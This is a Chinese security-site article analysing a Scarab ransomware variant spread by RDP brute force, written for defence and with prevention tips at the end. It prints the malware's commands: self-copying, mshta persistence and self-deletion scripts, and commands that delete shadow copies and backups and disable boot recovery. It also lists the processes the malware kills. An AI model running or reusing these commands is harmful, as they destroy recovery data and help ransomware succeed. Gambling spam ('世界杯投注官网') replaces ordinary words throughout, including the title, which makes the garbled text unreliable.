频道栏目
首页 > 安全 > 网络安全 > 正文

世界杯投注官网

2018-06-22 14:57:47      个评论      
收藏   我要投稿

一、事件背景

【勒索病毒样本】Scarab勒索病毒变种来袭。最近接到应急响应客户被勒索病毒攻击,深信服EDR安全团队捕获到相应的恶意样本,经分析确认此样本为Scarab勒索病毒变种样本。

Scarab勒索病毒是利用Necurs僵尸网络进行传播,Necurs是世界上最大的僵尸网络之一,曾用于传播多个恶意家族样本,最新变种主要通过RDP爆破+人工植入的方式传播感染主机。

爆破的相关日志,如下:

\

二、样本分析

(1)样本通过GetKeyboardType获取当前世界杯指定投注官网键盘类型,如下:

\

(2)进行一连串的字符串解密操作,得到程序的一些加密配置信息等,如下:

\

(3)打开注册表项HKEY_CURRENT_USER\Software\ILRTISo,如下:

\

查询idle注册表项,是否设置,如下:

\

(4)拷贝自身到%APPDATA%\Roaming目录下,并重命名为sevnz.exe,如下:

\

通过CreateProcess调用cmd.exe命名执行:

/c copy /y [Virus文件名路径] %APPDATA%\sevnz.exe,如下:

\

病毒母体拷贝自身到%APPDATA%目录下sevnz.exe,如下:

\

(5)查询%APPDATA%目录下是否存在sevnz.exe程序,如下:

\

然后自己传入参数“runas”,并调用ShellExecuteW生成一个新的进程,如下:

\

(6)执行%APPDATA%目录下的sevnz.exe程序,如下:

\

(7)sevnz.exe通过CreateProcess调用cmd.exe命名执行:

mshta.exe javascript:o=newActiveXObject(‘Scripting.FileSystemObject’);setInterval(function(){try{o.DeleteFile(‘[FileName.exe]’);close()}catch(e){}},10);

删除母体文件,动态调试,如下:

\

(8)母体样本通过删除sevnz.exe,来判断之前的sevnz.exe是否启动,如下:

\

如果程序已启动,删除会失败,如下:

\

(9)当sevnz.exe在运行之中时,调用JavaScript脚本,将此进程添加到注册表的auto-run,相应的脚本命令:

mshta.exe“javascript:o=new ActiveXObject(‘WScript.Shell’);

x=newActiveXObject(‘Scripting.FileSystemObject’);

setInterval(function(){try{i=x.GetFile(‘sevnz.exe’).Path;

o.RegWrite(‘HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo’,i);}

catch(e){}},10);

动态调试跟踪,如下:

\

自启动项创建完成之后,如下:

\

(10)创建加密线程,执行勒索病毒的主要加密流程,如下:

\

(11)通过JavaScript脚本读取注册表项HKEY_CURRENT_USER\Software\JBGUJ中的键值,然后执行里面的命令,如下:

\

注册表项中相关的命令脚本如下:

o=new ActiveXObject("WScript.Shell");

o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);

o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);

o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);

o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);

o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);

通过上面的脚本命令,删除磁盘卷影文件,防止世界杯指定投注官网恢复文件

(12)启动线程,执行加密流程,如下:

\

(13)遍历主机进程列表,发现如下进程列表,则结束,相关的进程列表如下:

agntsvc.exe;isqlplussvc.exe;ncsvc.exe;msftesql.exe;sqlagent.exe;sqlbrowser.exe;sqlservr.exe;sqlserver.exe;sqlwriter.exe;oracle.exe;ocssd.exe;dbsnmp.exe;synctime.exe;mydesktopqos.exe;agntsvc.exeisqlplussvc.exe;xfssvccon.exe;mydesktopservice.exe;ocautoupds.exe;agntsvc.exeagntsvc.exe;agntsvc.exeencsvc.exe;firefoxconfig.exe;tbirdconfig.exe;ocomm.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;dbeng50.exe;sqbcoreservice.exe;

动态调试,得到相关的进程列表如下:

\

结束进程的世界杯指定投注平台如下:

\

(14)加密文件的主函数过程世界杯指定投注平台,如下:

\
\

(15)删除HKEY_CURRENT_USER\Software\JBGUJ注册表项的内容,如下:

\

(16)加密流程执行完成之后,原文件变为了scarab后缀的文件,如下:

\

同时弹出相关的勒索信息,如下:

\

三、预防措施

同时深信服EDR安全团队提醒世界杯指定投注官网:

1.不要点击来源不明的邮件以及附件

2.及时给电脑打补丁,修复漏洞

3.不从垃圾网站或不明网站下载软件

4.安装专业的终端/服务器安全防护软件

5.此勒索病毒变种主要通过RDP爆破的方式,建议世界杯指定投注官网及时修改密码

上一篇:恶意程序KillDisk最新变种袭击银行系统
下一篇:macOS的快速浏览缓存可能会泄露加密数据
相关文章
图文推荐

关于我们 | 联系我们 | 服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑--致力于做实用的IT技术学习网站